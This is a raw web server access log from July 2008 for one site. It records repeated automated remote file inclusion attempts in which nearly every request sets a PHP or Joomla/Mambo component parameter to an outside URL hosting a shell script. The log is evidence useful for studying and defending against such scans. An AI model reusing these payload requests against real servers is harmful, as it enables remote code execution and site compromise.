85.119.244.16 - - [19/Jul/2008:09:12:08 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:12:08 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:09 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:09 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:11 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18397 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:12 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
204.11.233.78 - - [19/Jul/2008:09:12:12 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:12:18 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:12:20 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
81.2.200.22 - - [19/Jul/2008:09:12:29 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://www.bigexclusive.info/articles/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:12:35 -0700] "GET /logs/access_080329.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:12:35 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:12:36 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:12:36 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:12:36 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:12:38 -0700] "GET /logs/access_080315.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:12:38 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:12:40 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:12:42 -0700] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:12:43 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:12:44 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:12:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:12:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.810" "www.dmulk.com"
89.188.104.4 - - [19/Jul/2008:09:12:48 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dutadewata.com/saf-e.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:14:00 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:14:01 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:14:01 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:14:01 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:14:02 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:13 -0700] "GET /logs/access_080315.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:14 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:14 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.145.165 - - [19/Jul/2008:09:14:32 -0700] "GET //index2.php?option=com_user&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
88.84.145.165 - - [19/Jul/2008:09:14:34 -0700] "GET /logs//index2.php?option=com_user&Itemid=&mosConfig_absolute_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
151.67.109.62 - - [19/Jul/2008:09:14:43 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.elektroanlagen-sperling.de/i.txt?? HTTP/1.1" 200 18431 "-" "libwww-perl/5.808" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:43 -0700] "GET /logs/access_080315.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:44 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:14:44 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:14:59 -0700] "GET /logs/access_080322.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:15:03 -0700] "GET /logs/access_080117.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:15:03 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:15:04 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:15:10 -0700] "GET /logs/access_080320.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.145.165 - - [19/Jul/2008:09:15:15 -0700] "GET //index.php?INCLUDE_FOLDER=http://www.pne.de//contenido/includes/cmd.gif?%0D? HTTP/1.1" 200 18437 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
88.84.145.165 - - [19/Jul/2008:09:15:19 -0700] "GET /logs//index.php?INCLUDE_FOLDER=http://www.pne.de//contenido/includes/cmd.gif?%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:15:37 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://sunshineruby.com/gbook/cgi/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.158.65 - - [19/Jul/2008:09:15:49 -0700] "GET /logs/access_080320.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.131.43 - - [19/Jul/2008:09:15:51 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [19/Jul/2008:09:15:51 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
80.190.131.43 - - [19/Jul/2008:09:15:52 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 200 18433 "-" "libwww-perl/5.69" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:16:38 -0700] "GET /logs/access_080110.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:16:52 -0700] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:16:52 -0700] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:16:52 -0700] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:17:10 -0700] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:17:10 -0700] "GET /lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:17:10 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:17:33 -0700] "GET /logs/access_080117.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:17:34 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.157.129.6 - - [19/Jul/2008:09:17:35 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.196.41.226 - - [19/Jul/2008:09:18:03 -0700] "GET /logs/access_080329.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.38.22.250 - - [19/Jul/2008:09:18:18 -0700] "GET /logs/access_080329.log/lostpasswd.php?env[include_prefix]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:18:23 -0700] "GET /logs/?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 56851 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:18:26 -0700] "GET /?mosConfig_absolute_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:18:29 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:18:30 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [19/Jul/2008:09:18:43 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.schmid-telecom.com/privz.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:18:47 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:18:47 -0700] "GET /errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.148.101.224 - - [19/Jul/2008:09:18:48 -0700] "GET /logs/errors.php?error=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:18:50 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:18:51 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:18:51 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.23.156.220 - - [19/Jul/2008:09:19:29 -0700] "GET /logs/access_080320.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.rajacademy.com/shop/blocks/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:19:35 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:19:35 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.244.16 - - [19/Jul/2008:09:19:38 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:19:40 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.246.78.141 - - [19/Jul/2008:09:19:40 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:19:49 -0700] "GET /logs/access.log/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:19:49 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:09:19:49 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:19:58 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:19:59 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:20:03 -0700] "GET /logs/access_080117.log/config.php?path_to_root=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:20:03 -0700] "GET /config.php?path_to_root=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
211.247.226.253 - - [19/Jul/2008:09:20:03 -0700] "GET /logs/config.php?path_to_root=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:20:04 -0700] "GET /logs//Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.134.105.107 - - [19/Jul/2008:09:20:07 -0700] "GET //Forums/admin/admin_users.php?phpbb_root_path=http://h1.ripway.com/udpflood/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:20:28 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:20:57 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:20:57 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:20:58 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:21:01 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:21:01 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:21:02 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:21:09 -0700] "GET /logs/errors.php?error=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:21:09 -0700] "GET /errors.php?error=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.97.51.4 - - [19/Jul/2008:09:21:09 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:21:29 -0700] "GET /logs/errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:21:29 -0700] "GET /errors.php?error=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.87.80 - - [19/Jul/2008:09:21:35 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=[BiTcH]?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.15 - - [19/Jul/2008:09:21:45 -0700] "GET /errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:22:10 -0700] "GET /logs/access_080225.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:22:34 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:22:37 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:22:37 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.143.162 - - [19/Jul/2008:09:22:37 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:22:37 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:09:22:38 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:22:41 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.150.247.23 - - [19/Jul/2008:09:22:41 -0700] "GET /logs/access_080313.log//admin/classes/TplLoad.php?full_path_to_public_program=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.119 - - [19/Jul/2008:09:22:41 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.keywordworkshop.com/attachments/help/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:22:42 -0700] "GET /logs/includes/db_connect.php?baseDir=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [19/Jul/2008:09:22:42 -0700] "GET /includes/db_connect.php?baseDir=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
